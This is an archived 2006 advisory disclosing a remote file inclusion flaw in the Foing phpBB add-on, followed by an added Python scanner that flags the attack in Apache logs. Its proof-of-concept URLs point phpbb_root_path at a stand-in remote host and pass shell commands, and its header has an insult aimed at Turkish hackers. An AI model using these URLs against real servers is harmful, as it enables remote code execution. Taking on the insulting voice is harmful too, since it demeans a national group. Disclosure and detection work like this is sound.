SECURITYVULNS:DOC:12654
May 13, 2006 - 12:00 a.m.

[Kurdish Security # 7] Foing Remote File Include Vulnerability [PHPBB]

vulners.com

Kurdish Security Advisory

Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html

Foing Remote File Include Vulnerability [PHPBB] :}

"O History, either we will credit you with successes or we will count you as never having happened." Abdullah Ocalan

STOP THE MASSACRE IN TURKEY! FREEDOM FOR KURDISTAN!

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & [email protected]

Risk : High

Class : Remote

Script : Foing

Script Website : http://foing.sourceforge.net/

Version : Foing 0.7.0, 0.6.0, 0.5.0, 0.4.0, 0.3.0, 0.2.0

w0rkz : "Powered by foing 0.7.0 © 2003, 2004 Foing Group"

      "Powered by foing 0.6.0 © 2003, 2004 Foing Group" etc..

Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers, Kurdistan Cyber Army etc…

Special Bitch : Turkish LameRz :]


cmd shell example : the included file reads its command from the cmd shell variable ($_GET[cmd]);

Vulnerable code :

From config.php in the Foing directory you will find the following:

<?php

define('FOING_INSTALLED', true);

// Path to the phpBB root that the Foing scripts use when including phpBB's
// own files; the PoC below overrides it through the phpbb_root_path request
// parameter (the original value is elided in the advisory)
$phpbb_root_path = '…/';
$foing_prefix = $table_prefix;

?>

Proof Of Concept :

http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
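As an added defender's example (not part of the advisory or the Foing project): a Python scanner over Apache access-log lines that flags requests to the six Foing scripts listed above whenever they carry a phpbb_root_path parameter, classifying URL-style values as the remote-include pattern of the PoC and anything else as local path manipulation. The log lines, client addresses and hostnames are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Foing scripts named in the advisory's proof of concept
FOING_SCRIPTS = {"index.php", "song.php", "faq.php", "list.php",
                 "gen_m3u.php", "playlist.php"}

# Common/combined log format: client, identd, user, [timestamp], "request line"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

# A value that PHP's include() would fetch over the network (scheme:// or data:)
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*://|data:)', re.I)

def inspect_request(target):
    """Classify one request target; returns a finding dict or None.

    phpbb_root_path is a configuration variable, never a legitimate query
    parameter, so any request carrying it deserves a look: a URL-like value
    is the remote-include pattern, anything else (e.g. '../../') is a local
    path-manipulation attempt.
    """
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    params = parse_qs(parts.query, keep_blank_values=True)
    roots = params.get("phpbb_root_path")
    if script not in FOING_SCRIPTS or not roots:
        return None
    remote = any(REMOTE_RE.match(v) for v in roots)
    return {"script": script,
            "kind": "remote_include" if remote else "local_path",
            "root_values": roots,
            "has_cmd": "cmd" in params}

def scan_log(lines):
    """Run inspect_request over access-log lines, attaching client and time."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        finding = inspect_request(m.group("target")) if m else None
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"))
            findings.append(finding)
    return findings

# Constructed sample lines; the first mirrors the shape of the advisory's PoC URL
SAMPLE_LOG = [
    '203.0.113.7 - - [13/May/2006:00:00:01 +0000] "GET /foing/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname%20-a HTTP/1.0" 200 512',
    '198.51.100.4 - - [13/May/2006:00:00:02 +0000] "GET /foing/playlist.php?id=3 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [13/May/2006:00:00:03 +0000] "GET /foing/song.php?phpbb_root_path=../../&cmd=id HTTP/1.0" 500 0',
    '198.51.100.9 - - [13/May/2006:00:00:04 +0000] "GET /forum/viewtopic.php?t=5 HTTP/1.1" 200 7000',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['script']} {f['kind']} cmd={f['has_cmd']} root={f['root_values']}")
```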